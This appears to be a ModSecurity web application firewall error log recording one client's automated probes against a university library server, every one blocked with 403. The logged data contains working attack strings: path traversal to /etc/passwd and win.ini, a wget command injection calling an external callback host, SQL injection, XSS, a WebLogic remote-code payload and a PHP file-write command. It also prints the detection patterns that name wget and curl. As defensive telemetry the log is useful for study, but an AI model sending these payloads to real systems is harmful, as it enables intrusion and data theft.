[Tue Aug 29 11:46:02.376226 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAhrqNkAAAAo"]
[Tue Aug 29 11:46:02.412231 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAi5uBoAAAAS"]
[Tue Aug 29 11:46:07.388363 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26g1em7cxkqccd4p.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAhzvhEAAAAx"]
[Tue Aug 29 11:46:08.408118 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EMCo-f0AAAhZRksAAAAG"]
[Tue Aug 29 11:46:09.376292 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAi5uDEAAAAS"]
[Tue Aug 29 11:46:09.570312 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAhtjjMAAAAq"]
[Tue Aug 29 11:46:12.388443 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FMCo-f0AAAi0JJUAAAAK"]
[Tue Aug 29 11:46:12.498888 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAhrqPMAAAAo"]
[Tue Aug 29 11:46:13.409665 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAhrqPgAAAAo"]
[Tue Aug 29 11:46:13.476528 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAib50YAAAAA"]
[Tue Aug 29 11:46:13.492620 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAhrqPwAAAAo"]
[Tue Aug 29 11:46:14.432877 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAdxUrcAAAAC"]
[Tue Aug 29 11:46:15.380060 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14F8Co-f0AAAhBSGYAAAAX"]
[Tue Aug 29 11:46:15.645137 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAfEB7sAAAAO"]
[Tue Aug 29 11:46:18.482800 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAhZRmEAAAAG"]
[Tue Aug 29 11:46:18.486414 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAhrqREAAAAo"]
[Tue Aug 29 11:46:19.460227 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAhBSGwAAAAX"]
[Tue Aug 29 11:46:20.520714 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14HMCo-f0AAAhZRmwAAAAG"]
[Tue Aug 29 11:46:20.626544 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAdxUtkAAAAC"]
[Tue Aug 29 11:46:22.564770 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14HsCo-f0AAAhtjkUAAAAq"]
[Tue Aug 29 11:46:27.479650 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAdxUu0AAAAC"]
[Tue Aug 29 11:46:28.384161 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14JMCo-f0AAAi0JNoAAAAK"]
[Tue Aug 29 11:46:28.407880 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAhui4QAAAAr"]
[Tue Aug 29 11:46:28.527623 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAhBSI0AAAAX"]
[Tue Aug 29 11:46:29.686671 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JcCo-f0AAAi0JOkAAAAK"]
[Tue Aug 29 11:46:30.678228 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAjCa8UAAAAB"]
[Tue Aug 29 11:46:30.735391 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAi0JPUAAAAK"]
[Tue Aug 29 11:46:31.404627 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14J8Co-f0AAAjH@s8AAAAI"]
[Tue Aug 29 11:46:32.031827 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14KMCo-f0AAAi5uH8AAAAS"]
[Tue Aug 29 11:46:33.383089 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KcCo-f0AAAfEB@QAAAAO"]
[Tue Aug 29 11:46:33.443151 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAjL8OMAAAAR"]
[Tue Aug 29 11:46:34.396532 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAjKyp4AAAAQ"]
[Tue Aug 29 11:46:35.431491 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAjKyqEAAAAQ"]
[Tue Aug 29 11:46:39.446402 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAhZRq0AAAAG"]
[Tue Aug 29 11:46:41.459511 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14McCo-f0AAAjKyrgAAAAQ"]
